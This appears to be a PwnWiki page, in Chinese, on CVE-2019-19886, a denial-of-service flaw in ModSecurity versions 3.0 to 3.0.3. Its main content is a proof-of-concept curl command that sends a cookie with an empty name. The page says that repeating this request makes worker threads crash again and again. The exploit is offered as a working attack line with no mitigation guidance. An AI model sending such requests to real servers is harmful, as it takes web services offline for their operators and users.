CVE-2019-19886 ModSecurity 拒絕服務漏洞

From PwnWiki
Revision as of 15:16, 10 July 2021 by Pwnwiki (talk | contribs) (Marked this version for translation)
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Other languages:
Chinese

影響版本

ModSecurity 3.0 - 3.0.3

POC

不斷向服務器發送此類請求將使工作線程反复崩潰

curl -s -H 'Cookie: =test' 'http://test/'